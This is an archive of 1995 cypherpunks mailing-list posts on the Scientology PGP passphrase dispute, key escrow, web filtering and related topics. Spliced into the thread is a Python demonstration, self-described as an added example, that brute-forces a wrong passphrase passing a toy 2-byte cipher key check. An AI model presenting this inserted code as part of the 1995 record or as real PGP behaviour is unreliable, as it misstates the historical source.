hplyot's links to the world is 2mbit/s, feel free to fetch it from here...

 >   HTML sites:
 >      http://www.oberlin.edu/~brchkind/cyphernomicon/
 >      http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ
 >      text.  very responsive and fast (6 minutes for my 14.4 connection).
 >      http:/www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ
 >      text
 >      http://www.msen.com/~lwp/Cyphernomicon.gz
 >      About 432Kbytes.  Need g[un]zip utility.
(here, typing get CP-FAQ instead of get CP-FAQ.gz will gunzip it on
the fly, but you shall IMO get gzip for your system anyway :-)

hope this helps
regards
dl

- -- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postmaster@virgies.com
Date: Tue, 12 Sep 95 04:20:10 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
Message-ID: <MAIL.34ED@virgies.com>
MIME-Version: 1.0
Content-Type: text/plain


The following message is being returned to its sender because the addressee
does not exist at destination <virgies.com>.

<---- Header information -------------------------------------------->
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by
 altmail.holonet.net with ESMTP
       id BAA17972; Sat, 9 Sep 1995 01:50:44 -0700
Received: from toad.com by relay3.UU.NET with SMTP 
       id QQzgkp04297; Sat, 9 Sep 1995 04:49:08 -0400
Received: by toad.com id AA21380; Sat, 9 Sep 95 01:46:19 PDT
Received: from blob.best.net by toad.com id AA21371; Sat, 9 Sep 95 01:46:13
 PDT
Received: from miron.vip.best.com (daemon@miron.vip.best.com
 [204.156.129.176]) by blob.best.net (8.6.12/8.6.5) with ESMTP id BAA14766;
 Sat, 9 Sep 1995 01:46:04 -0700
Received: (from daemon@localhost) by miron.vip.best.com (8.6.12/8.6.12) id
 BAA01249; Sat, 9 Sep 1995 01:41:32 -0700
Date: Sat, 9 Sep 1995 01:41:32 -0700
Message-Id: <199509090841.BAA01249@miron.vip.best.com>
To: andrew_loewenstern@il.us.swissbank.com, cypherpunks@toad.com
Remailed-By: remail@extropia.wimsey.com
Comments: This message was anonymously remailed. Do not reply
        to the address in the from header, unless you wish to report
        a problem. Thank you.
From: cypherpunks@toad.com
References: <9509081654.AA03407@ch1d157nwk>
Subject: Re: Scientology tries to break PGP - and fails?
Sender: owner-cypherpunks@toad.com
Precedence: bulk

>
>Tom Rollins writes:
>>  If this is the file that the Co$ is trying to crack, then what the
>>  is being asked for is a pass phrase that can be handed to the Co$
>>  that will pass the PGP valid key check and still not decrypt the
>>  data to anything useful.
>
>Well, I don't have the PGP 'conventional' encryption format memorized, but
>there is probably a constant after the IV that is prepended to the data.  The
>constant is used to determine if the key is correct.  Since the conventional
>encryption runs in CFB mode and there is a full block of random IV at the
>beginning of the file, it is extremely unlikely that a key could be found
>that would properly decrypt only the first two blocks while leaving the rest
>unreadable...
>
>>  If Larry Wollersheim does have the valid key.  It would be a simpler
>>  process to know what fake key to use and work it backwards through
>>  the MD5 to arrive at an ascii string to produce the fake key.
>
>Not really.  Even if you could find an IDEA key that would produce the
>desired output it would be hard to find a passphrase that would produce that
>key when hashed.  One of the properties of one-way hash functions is that it
>is difficult to find a plaintext that produces a given hash.  Hence the term
>'one-way'....  Even if you did find a passphrase (which, if MD5 is strong,
>would require something like 2^64 operations), it would likely be long, have
>8-bit chars, and would be impossible to type in.  It would be tough to
>convince anyone that it was the real passphrase.
>
>
>andrew
>


There was a hack to pgp ui published a while back that would allow
someone decrypting a RSA encrypted file to print out the idea key.

Another feature of the hack allowed someone with the idea key to decrypt
an RSA PGP encrypted file ignoring the RSA headers and using the IDEA
key directly.

Using this software should allow the receiver of an RSA PGP encrypted
file to allow someone else to decrypt it (by giving them the IDEA key)
without exposing the secret key. The IV block check will  allow them to
check that they are using the correct idea key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@toad.com
Date: Sat, 9 Sep 95 01:46:19 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <9509081654.AA03407@ch1d157nwk>
Message-ID: <199509090841.BAA01249@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>Tom Rollins writes:
>>  If this is the file that the Co$ is trying to crack, then what the
>>  is being asked for is a pass phrase that can be handed to the Co$
>>  that will pass the PGP valid key check and still not decrypt the
>>  data to anything useful.
>
>Well, I don't have the PGP 'conventional' encryption format memorized, but  
>there is probably a constant after the IV that is prepended to the data.  The  
>constant is used to determine if the key is correct.  Since the conventional  
>encryption runs in CFB mode and there is a full block of random IV at the  
>beginning of the file, it is extremely unlikely that a key could be found  
>that would properly decrypt only the first two blocks while leaving the rest  
>unreadable...
>
>>  If Larry Wollersheim does have the valid key.  It would be a simpler
>>  process to know what fake key to use and work it backwards through
>>  the MD5 to arrive at an ascii string to produce the fake key.
>
>Not really.  Even if you could find an IDEA key that would produce the  
>desired output it would be hard to find a passphrase that would produce that  
>key when hashed.  One of the properties of one-way hash functions is that it  
>is difficult to find a plaintext that produces a given hash.  Hence the term  
>'one-way'....  Even if you did find a passphrase (which, if MD5 is strong,  
>would require something like 2^64 operations), it would likely be long, have  
>8-bit chars, and would be impossible to type in.  It would be tough to  
>convince anyone that it was the real passphrase.
>
>
>andrew
>


There was a hack to pgp ui published a while back that would allow
someone decrypting a RSA encrypted file to print out the idea key.

Another feature of the hack allowed someone with the idea key to decrypt
an RSA PGP encrypted file ignoring the RSA headers and using the IDEA
key directly.

Using this software should allow the receiver of an RSA PGP encrypted
file to allow someone else to decrypt it (by giving them the IDEA key)
without exposing the secret key. The IV block check will  allow them to
check that they are using the correct idea key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Fri, 8 Sep 95 23:07:24 PDT
To: cypherpunks@toad.com
Subject: Open letter to Geoff Greiveldinger, DoJ
Message-ID: <199509090607.CAA02659@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I just posted the following.  I'll have to wait to see if the moderator
accepts it.

Date: Sat, 9 Sep 1995 01:11:06 -0400
From: Carl Ellison <cme>
To: risks@csl.sri.com
Subject: Open letter to Geoff Greiveldinger, DoJ

NIST (the National Institute of Standards and Technology) held a two day
public meeting on September 6 and 7, 1995 to discuss Software Key Escrow as a
possible means of achieving export of cryptography.

In the morning of 9/7, Geoff Greiveldinger of the Department of Justice gave a
description of the kinds of crimes which DoJ wants to use wiretapping to
solve.  He closed this litany of lawbreaking with the assertion that software
manufacturers don't want to provide products which allow such lawbreakers to
keep their criminal evidence hidden from law enforcement.

I'm sorry to disillusion you, Geoff, but I *do* want to make such systems.

Would you have Ryder stop renting trucks because some terrorist decided to
fill one with explosives and kill many innocent children?  Would you have
Americans stop making automobiles because bank robbers have been known to use
cars for getaways?  Would you have all new buildings constructed with FBI
microphones in every wall because some criminals meet in private rooms in
order to plan crimes?

When an American company sweeps its conference room for bugs, finds some and
destroys them, it doesn't matter whether those bugs were planted by industrial
spies or the FBI.  The company has a right to eliminate them.  When that
company ties two such conference rooms together by video-conference equipment
and encrypts the line between them using strong link encryption, it is
performing the same defensive operation in cyberspace.  It is protecting
itself from spies and it doesn't matter that the wiretaps it frustrates might
be illegal ones by industrial spies or legal ones by the FBI.  The right to
attempt to achieve privacy is a long-standing one in this country and not one
to allow to be lost.

When I design and build systems for privacy for my customers, I am providing
products for law-abiding, honest people.  I am aware of criminals, of course.
Criminals are the threats against whom I protect my customers.  These
criminals are usually not in the government but that doesn't mean that I
believe I should offer my honest customers up for a strip-search in
cyberspace.  The law enforcement agencies of this free country have no right
to expect blanket access to the ciphertext of citizens.  It will take
legislation to get that right and I will do everything in my power to keep
such legislation from passing.  Barring such legislation, I will make sure
that honest American citizens have cryptography with which to attempt to
maintain their privacy, even from the government.  We have the right to
attempt to keep a secret from government agencies and continuous demonstration
of that right is an important part of this free country.

On the other hand, I am sympathetic to law enforcement officers.  I have
several friends in that business.  I have asked my friends and acquaintances
who do surveillance (2 IRS agents investigating organized crime for tax
evasion; 2 undercover cops in Boston's highest drug neighborhood; 1 DEA agent
in the midwest) if they ever encounter encrypted communications or files.
They don't.  Neither does anyone in their offices.  Of course, even if they
did it would remain so important to preserve our right to attempt to keep
secrets from the government that their frustration would just have to be
accepted.  The fact that this isn't a real problem makes my decision that much
easier.  I am left with no moral qualms at all.

In summary, criminals are so few that I will not design for them.  I will not
treat my vast majority of honest users as if they were criminals just because
some criminal might someday use my product and frustrate you.

ObRisk: We run the risk of losing our fundamental right to attempt to keep a
secret from the government -- a practice we need to preserve in order to
protect ourselves from criminals in cyberspace.  There are powerful forces in
the US government attempting to cajole us into giving up that right.

[see http://www.clark.net/pub/cme/html/nist-ske.html for more on this subject]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Sep 95 19:10:34 PDT
To: cypherpunks@toad.com
Subject: Web Exon A-rate
Message-ID: <199509090210.EAA17069@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



WS Journal, Sept. 8, 1995.


Cleaning the Web: Companies to Seek Pornography Blocker

Array of Technology Firms Will Join in Effort to Let
Parents Screen the Internet

By Jared Sandberg


Some of the high-tech industry's biggest companies are
banding together in a broad-based consortium to develop
a way for Internet users to screen out pornography and
other offensive material.


The group, whose creation is expected to be announced on
Monday, is believed to include International Business
Machines Corp. and Microsoft Corp., telecommunications
giants AT&T Corp. and MCI Communications Corp., on-line
firms America Online Inc. and Netscape Communications
Corp. Entertainment heavyweights Time Warner Inc. and
Viacom Inc. also have been approached.


People familiar with the plans said the consortium hopes
to develop industrywide standards for obscenity-blocking
technology as a way to forestall much-criticized
proposals from federal regulators. It amounts to an
effort to develop a voluntary Internet equivalent of the
"v-chip" that has been proposed as a way for parents
to block sex-and-violence-laden TV programs.


The venture will pursue a system that would allow
Internet users -- such as teachers or parents -- to
prevent pornography from being accessed by children.


The group will be led by the World Wide Web Consortium at
the Massachusetts Institute of Technology, executives
said. The consortium, funded by roughly 80 companies,
aids in the development of the Web, the multimedia
portion of the Internet, by producing technical
specifications and software.


Various companies have worked on ways to shield children
from indecent material. The new consortium will pursue an
overarching method available to all Internet players --
software firms, access providers and on-line services.


MIT will coordinate this "umbrella organization to
prevent industry infighting," said one executive. "It's
aimed at creating a standard that all the software
companies can develop for." A separate project by
Microsoft and Netscape, together with two smaller firms,
SurfWatch Software Inc. and Progressive Networks Inc.,
will now be folded into the new consortium, another
executive said.


The effort follows such proposals as the antipornography
provision of Sen. James Exon (D., Neb.), which won
overwhelming support in the Senate and would slap prison
terms on people who make "indecent" remarks on-line.


Most of the proposals have been met with scorn from the
Internet industry. Executives have said that legislators
could cripple the commercial growth of the Internet
before it emerges from infancy.


------



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 8 Sep 95 20:32:43 PDT
To: cypherpunks@toad.com
Subject: [NOISE/Fun] some 'special' primes
Message-ID: <9509090332.AA06578@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I hope this is not already extremely well known,... but, seeing on the list
a sig with someone claiming to have the 'last' prime, I played a bit
this nite and searched for the *first* alphabetically sorted prime
(once written as spelled, sorted like with unix's sort)
depending on the language :

Easiest: English : 11 : eleven
A bit more fun : German : 811 (dunno how to write it, but it starts
with an "a")
Exotic one : slovenian: 10019 desettisocdevetnajst

And..... the tricky one, which I hope is the good one (challenge: find
one 'before') :
French (and possibly spanish/italian,...too) : 105 105 000 105 167
(it spells cent cinq mille cent cinq milliards cent cinq mille cent
soixante sept) [note that 'billion' is not used for numbers in common
language, and that soixante-dix has a - and not a space :-) ]

More languages ? better results anyone :-) ?

Regards
dl

ps: I used gnu MP lib for my hack when I hit the 2^32 limit, but it's
rather slow... (ok, it's prolly due to my lazy prime algo too, but...)
is there some well-known fast mp lib to play around with primes ?
(should I look and extract PGP's ?)
- -- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
105 105 000 105 167





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Sat, 9 Sep 95 10:10:55 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails? (fwd)
Message-ID: <199509091707.KAA15642@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Tom Rollins writes:
> >>  If this is the file that the Co$ is trying to crack, then what the
> >>  is being asked for is a pass phrase that can be handed to the Co$
> >>  that will pass the PGP valid key check and still not decrypt the
> >>  data to anything useful.
> >
> >Well, I don't have the PGP 'conventional' encryption format memorized, but  
> >there is probably a constant after the IV that is prepended to the data.  The  
> >constant is used to determine if the key is correct.  Since the conventional  
> >encryption runs in CFB mode and there is a full block of random IV at the  
> >beginning of the file, it is extremely unlikely that a key could be found  
> >that would properly decrypt only the first two blocks while leaving the rest  
> >unreadable...
> >
> >>  If Larry Wollersheim does have the valid key.  It would be a simpler
> >>  process to know what fake key to use and work it backwards through
> >>  the MD5 to arrive at an ascii string to produce the fake key.
> >
> >Not really.  Even if you could find an IDEA key that would produce the  
> >desired output it would be hard to find a passphrase that would produce that  
> >key when hashed.  One of the properties of one-way hash functions is that it  
> >is difficult to find a plaintext that produces a given hash.  Hence the term  
> >'one-way'....  Even if you did find a passphrase (which, if MD5 is strong,  
> >would require something like 2^64 operations), it would likely be long, have  
> >8-bit chars, and would be impossible to type in.  It would be tough to  
> >convince anyone that it was the real passphrase.
> >
> >
> >andrew
> >
> 
> 
> There was a hack to pgp ui published a while back that would allow
> someone decrypting a RSA encrypted file to print out the idea key.
> 
> Another feature of the hack allowed someone with the idea key to decrypt
> an RSA PGP encrypted file ignoring the RSA headers and using the IDEA
> key directly.
> 
> Using this software should allow the receiver of an RSA PGP encrypted
> file to allow someone else to decrypt it (by giving them the IDEA key)
> without exposing the secret key. The IV block check will  allow them to
> check that they are using the correct idea key.
> 

Looking at the source code shows that all that is needed to
pass the PGP key check is for the first two blocks to decode
in such a way that the last 2 bytes of the IV match the 2
check bytes before the actual message. Thus the first 6 bytes
of the IV and the last 6 bytes of the next block need not
match the actual message.

There was a bug in the older versions of PGP that set the
IV to a constant instead of a random value when encrypting
with the "-c" option.

I made a mistake thinking that knowledge of the correct
key would help in creating a fake key.
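
The 2-byte key check described in the message above, as an added example (not part of any post in this thread and not PGP's source code). Assumptions: a SHA-256 based keyed function stands in for IDEA, plain CFB is used rather than PGP's exact variant, and every name and sample string is constructed for illustration. It shows why passing the check is weak evidence of a correct key: the check carries only 16 bits, so some wrong passphrase passes after about 2^16 guesses while the message still decrypts to garbage.

```python
import hashlib
import os

BLOCK = 8  # IDEA works on 64-bit blocks


def passphrase_to_key(passphrase: bytes) -> bytes:
    # The thread describes the key as the MD5 hash of the passphrase.
    return hashlib.md5(passphrase).digest()


def block_fn(key: bytes, block: bytes) -> bytes:
    # ASSUMPTION: stand-in for IDEA. CFB only uses the cipher's forward
    # direction, so a keyed one-way function over 8 bytes is enough here.
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb(key: bytes, data: bytes, decrypt: bool) -> bytes:
    feedback = bytes(BLOCK)  # all-zero start; the random prefix plays the IV role
    out = bytearray()
    for i in range(0, len(data), BLOCK):
        chunk = data[i:i + BLOCK]
        stream = block_fn(key, feedback)
        result = bytes(a ^ b for a, b in zip(chunk, stream))
        out += result
        feedback = chunk if decrypt else result  # feedback is always ciphertext
    return bytes(out)


def encrypt_conventional(passphrase: bytes, message: bytes, prefix=None) -> bytes:
    # 8 random bytes, then a repeat of their last 2 bytes, then the message.
    prefix = os.urandom(BLOCK) if prefix is None else prefix
    body = prefix + prefix[-2:] + message
    return cfb(passphrase_to_key(passphrase), body, decrypt=False)


def key_check(passphrase: bytes, ciphertext: bytes) -> bool:
    # Only bytes 6..7 of the prefix are compared with the 2 check bytes;
    # the other 6 prefix bytes and the message are never examined.
    head = cfb(passphrase_to_key(passphrase), ciphertext[:BLOCK + 2], decrypt=True)
    return head[6:8] == head[8:10]


def decrypt_conventional(passphrase: bytes, ciphertext: bytes) -> bytes:
    return cfb(passphrase_to_key(passphrase), ciphertext, decrypt=True)[BLOCK + 2:]


def find_passing_wrong_passphrase(ciphertext: bytes, real: bytes, limit=2_000_000):
    # Counts how many wrong guesses are needed before one passes the check.
    for tries in range(1, limit + 1):
        guess = b"guess-%d" % tries
        if guess != real and key_check(guess, ciphertext):
            return guess, tries
    return None, limit


if __name__ == "__main__":
    real = b"constructed real passphrase"
    message = b"constructed sample plaintext, not from the thread"
    ct = encrypt_conventional(real, message)
    wrong, tries = find_passing_wrong_passphrase(ct, real)
    print("real passphrase passes check:", key_check(real, ct))
    print("wrong passphrase %r passes after %d guesses" % (wrong, tries))
    print("its decryption:", decrypt_conventional(wrong, ct)[:16].hex(), "...")
```

A verifier that needs to know the key is the right one has to check the decrypted content itself, for example against a hash or signature over the plaintext, rather than rely on the prefix check.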




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 9 Sep 95 07:08:41 PDT
To: Greg Broiles <greg@ideath.goldenbear.com>
Subject: Re: Scientology/Wollersheim as test case for key disclosure
In-Reply-To: <199509090742.AA15129@ideath.goldenbear.com>
Message-ID: <Pine.PMDF.3.91.950909100445.541100226A-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Sep 1995, Greg Broiles wrote:

> 
> the pleadings" (Fed. R. Civ. P. 26(a)(1)(B)). I don't see why
> Wollersheim couldn't comply with the discovery rules by providing 
> plaintext copies of all relevant information, unless for some reason
> the passphrase is itself relevant.
> 
Ah.  but if there is no plaintext, the question is whether you comply 
with the rule by providing the encrypted text rather than plaintext.  I 
would say you have to provide the plaintext in the absence of a legitimate 
privilege claim, but I don't recall a case to this effect (there is 
precedent for requiring translation of foreign language documents when 
the request is covered by an evidence convention; I don't recall if there 
are any such cases that fall purely under domestic US rules).  Anyone have 
chapter and verse?


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 9 Sep 95 11:00:49 PDT
To: cypherpunks@toad.com
Subject: Re: 9K P6
In-Reply-To: <199509082135.RAA26681@pipe2.nyc.pipeline.com>
Message-ID: <950909.114931.1m4.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jya@pipeline.com quotes an Intel press release:

> Today, by making it possible to ensure the safety, reliability,
> and performance of the weapons stockpile while foregoing nuclear
> testing, the Intel/Sandia teraflop computer can help the world take
> a further step back from the shadows of war into the light of peace.

Intel's PR department has a great future doing Gummint work.  This is a
stellar example of Doublespeak.  Kinda makes me nauseous.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 9 Sep 95 12:41:21 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509091941.MAA04904@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:44 PM 9/8/95 -0400, you wrote:
>We wish!  We really wish!

"Fill that lawyer with a few more slugs of encryption!"

The argument that encryption will free us from all the legal ills of the
world is pretty specious.  If anything it will make more work for lawyers as
the non-clue-endowed portion of the world tries to come to terms with the
new technology.  They will make rules and subsets of rules and exceptions to
rules and variations to interpretations of rules that will make the current
set look like the rules to "chutes and ladders".  Part of the job of the
lawyer class is to guarantee the existence of work for other lawyers (as
well as themselves).  It does not depend on what the medium of exchange is.
Lawyers and government forces will try and figure out some way to try and
extract it from you.

The government is trying very hard to keep any scrap of power from creeping
away from them.  You can bet that they will try every thing they can think
of, rational and irrational, to regulate and control the wilds of
cyberspace.  They will pump up every imaginary boogieman to help them get
the public to swallow what they are fed.  By the time they figure out they
have been had, it will be too late.  Cypherpunks must be the syrup of ipecac
to the government's dose of poison to the body politic!  (I need to start
drinking more coffee in the morning.  I cannot believe I wrote that...)

Unfortunately the public does not thrive on logic.  They had been trained to
react emotionally to things and not react logically.  I am not certain what
can be used to get them to realize why they need encryption.  Dispelling the
bogeymen is one need. The other thing is that the tools need to be made as
simple as possible.  The current tools for use require a fair bit of
technical understanding.  Until they have an integrated front-end that makes
it about as easy to use as America On-Line, encryption will not gain
widespread usage.  This is the type of code that needs to be written.
Making integrated tools like newsreaders and mail programs that support
strong encryption directly is what is needed for widespread use.  (As well
as being usable programs in and of themselves.  Many of the programs for
news and mail are crap.)  Making cryptography a "cool and fun thing to use"
will help dispel many of the myths and may help to defuse the government
created bogey men.  (Of course they will claim that it aids "criminals and
terrorists", but to them EVERYONE is a criminal and a terrorist.)  
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 9 Sep 95 13:03:58 PDT
To: cypherpunks@toad.com
Subject: Internet commerce mtg, Denver
Message-ID: <199509092000.NAA14106@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I went to an Internet commerce convention meeting in Denver
last week, and thought some here would be interested in 
some of the topics and companies. 

the most important company I saw at the meeting is called
"YellowNet". I knew this would happen someday, but this company
is attempting to build up a *world wide* online business
directory accessible over the web. they are trying to 
build up the infrastructure to handle up to 1M hits per
day. a rep told me they were going to go all out in a 
publicity blitzkrieg at the beginning of Oct. , but for
now they are getting ready for prime time. its currently
a private company but I suspect they may go public in
a year or two.

the rep told me something interesting: he said that every
Bell phone book is actually "seeded" with dummy names
so they can detect copyright infringers. if you come out
with a business directory, these Bells will just scan for
the fake names that they have inserted into their own listings.
if they find them, supposedly they can show them to a copyright
judge and he will immediately close down your operation and
fine you, almost no questions asked. I didn't know how much
of this really happens (the legal stuff sounded questionable
to me) but it is an interesting "real world" instance of
copyright terrorism prevention that the "information liberation
front" would have to contend with. 

the rep told me that they were willing to go to "Philippine
calling houses" that do nothing but contract out to companies,
and have the laborers dial the long lists of phone numbers
to verify them. as I understand it they exist and supposedly
the long distance is so cheap now that they are actually
profitable being run out of the Philippines or wherever.
he said his company was about to do this when
they found a national CD directory of businesses, and they
were grudgingly willing to license the CD information for the web pages.

anyway, cpunks, you may be interested in getting into
the ground floor of something like this. the yellow pages
are an *extremely* lucrative source of income for phone
companies and if they don't compete over the web, I think
they are going to become increasingly obsolete-- esp. when
the Web becomes accessible to the home more readily through
e.g. cable companies.

the URL: http://www.yellownet.com

what I am suspecting however is that these kinds of services
are going to be common, and it will not be that difficult to
get your *pointer* into them for free. as far as them offering
advertisements, though, I can't see how they could charge
much more than a standard web site service charge for some
pages. in other words, the days of hundreds of dollars for
a display ad are probably not going to happen on the web,
IMHO. and I don't see how they could charge for mere pointers
at all, given that the competition will probably give them
away.

--

the other major companies at the show were generally large and 
small internet providers, and a lot of web page consulting firms
(large and small). various network connection providers &
consultants, etc.

another thing I would like to clue everyone in on, if it
isn't already obvious: the Web is going to go crazy as
companies realize they can have dynamic forms to serve
customers without any clerks required. this is going to 
be a *very* hot area of development over the next few
years IMHO.

 it is really not that big of deal to have
an inert "online brochure" but the technical capability
required to do programming behind forms to interface with
company databases is not trivial, and I think this is
going to become an extremely hot occupation over the next
few years. in other words, programmers who can customize
web sites to interface to the existing company's databases
and computer infrastructure will be very valuable. this
is called "CGI"; many of you are probably already experts
in it. (if you are, I'd like to talk to you about an 
application I'm trying to write...)

examples of this are infinite, but a few: a customer could
query the company inventory, find what stores are nearest
to his home, find what store has what he wants in stock immediately,
check on special prices and discounts of the moment, etc.
he might be able to put himself on a company mailing list,
etc.  so far I have not seen this very widespread, these
customized web applications, but I think they are really
going to proliferate massively.

I have also been seeing a lot of excitement over Java, and
I think this really has the potential to become a "net
standard binary interchange format". however I think the
day when the Java apps are proliferating all over the
net will be quite awhile away (6 mos or more at least) and
that businesses are still probably going to want to use
the more prosaic form interfaces for compatibility 
and simplicity.

Java is really starting out right, in that it begins at
day 1 as a totally free, open standard. Sun and Netscape are
not claiming burdensome proprietary rights to it. this
makes it amazingly attractive. the market has shown repeatedly
that it will often go with an inferior open standard in
preference to a technologically superior closed one. (and
IMHO with good reason.. the market is pretty rational, just
not in ways technophiles necessarily expect).

another thing I saw that Sun is promoting: they now have
Web authoring applications that require almost no HTML
expertise whatsoever. you can drag and drop pictures where
you want them in the documents etc.  I suspect this may
become the preferred way to work on web documents in the future
to the point that people who actually memorize all the HTML
commands may be in the minority. this actually argues in favor
of a HTML that is not necessarily that pretty or syntactically
consistent (of course, both aspects have already been pretty
much lost in the mad rush to add new features anyway). 

--

another thing I'd like to point out is that there are a lot
of hackers here with specialized knowledge into the web
and perl and other tools, and in our culture (the cypherpunk
list, e.g.) these things are considered pretty simple, mundane,
and obvious, but there is
an enormous business culture out there with a lot of money
and not very many clues about this technology. the consulting
opportunities for "small fries" are becoming very attractive
and widespread. it is easy for us to say, "oh, that's no big
deal, why would anyone pay money for that??" but in fact what
is happening is that people are paying *big* money for simple
things like HTML expertise.

there were a total of about 50 classes at this show, and you'd
be really surprised how many were on fairly basic subjects like
"what is the internet? what is the web? what can it do for me?"
etc.  however many of these classes focused on secure banking
transactions.

and cryptographic expertise will probably move to the forefront
of job requirements in about a year for these kinds of jobs, I
would imagine. they will probably tend to emphasize the need
for background in security related applications. right now there
are a lot of toy, insecure applications but it is only a matter
of time before people realize that if you really want to get
serious, you have to have cryptography tied in and sharp people
to plug all possible security holes, and you don't want stuff
made out of "bubblegum and baling wire".

so it appears that cypherpunks are really positioned on the crest 
of a tidal wave!! any of "us" who have been on the list in the
pre-web era are beginning to feel like old fogeys from the 
prehistoric era!! it seems that cyberspace for the elite was
born with the Internet, but "cyberspace for the unwashed masses"
was born with the Web.


--Vlad Nuri






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 9 Sep 95 13:07:51 PDT
To: cypherpunks@toad.com
Subject: Re: Sigh Re: not a flame please read and think about this
Message-ID: <199509092006.NAA05181@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Pat F A R R E L L wrote:
 
/ Subject line is bull*&^&, IMHO, of course

Hey everyone has an opinion.
 
 In message Sat,  9 Sep 1995 16:40:00 UTC, an116512@anon.penet.fi  writes:
 
 > to make my point: why is pat farrel helping the nsa and nist make
 
 /Learn to spell my name. It is on my .sig, my keys, and in my userid.
 /We blockheaded, Irish Catholic Americans are damn proud of our name.
 /Farrell's (along with other cheap Irish labor) built the railroads
 /from Chicago west.  Please spell it correctly, even if you are flaming me.
 
F A R R E L L

M O U S E

 > hey why not just write the escorw code for them!!!???
 > is mr farrel just being naive or is does he realize who hes working for?
 > sorry to single him out but this is just an example of what im talking
 > about.
 
 /I doubt that this clown deserves a response, but...
 
Then shut up.

 /There were a number of cypherpunks there. I can't speak for all,
 /but I expect motives include:
 

 /- attempting to clarify vague and confusing wording so we could
 /understand what they wanted.
 
'k

 /- seeing that working with them, rather than yelling at their stupidity,
 /has a higher chance of getting results.
 
Beware of compromise, you become the rag puller for the rapist.

/ - we got to meet influential folks from industry who agree with us.
 
'k

 /- some of us aren't completely opposed to CKE. I think it has value.
 /If we could convert their plan for GAK into CKE, it would be a big win,
 /well worth the effort.

Yea right. 

/ - they are going to promulgate a FIPS PUB standard next week, whether I
/like it or not, and whether I help or not. It is better to have that
/standard understandable and clear than fuzzy and subject to subjective
/evaluation. 

Clear as any government forced standard can be. 

/ - getting preposterous misstatements into the formal Federal Register so
/ we can quote it back to them in the congressional hearings. Mr Geoff
/ Greivelddinger's words should be handy to quote, for one example.
 
'k

 /- there are lots more, but I doubt that I can convince this clown.
 
Then shut up.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 9 Sep 95 11:43:35 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology/Wollersheim as test case for key disclosure
In-Reply-To: <Pine.PMDF.3.91.950909100445.541100226A-100000@umiami.ir.miami.edu>
Message-ID: <9509091842.AA13158@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



One solution to this problem would be to modify PGP so that the session key for 
the document was released rather than the passphrase for the public key. The 
former would provide only read access, the latter would allow the scientologists 
to forge Wollersheim's signature on other material. In addition many of the 
documents may be subject to privilege.


I would have thought that there would be grounds to oppose the court action in 
any case on various grounds, not least the previous judgement which the 
Scientologists lost and have failed to pay the damages awarded. There might also 
be grounds to oppose disclosure if the case was brought in order to obtain 
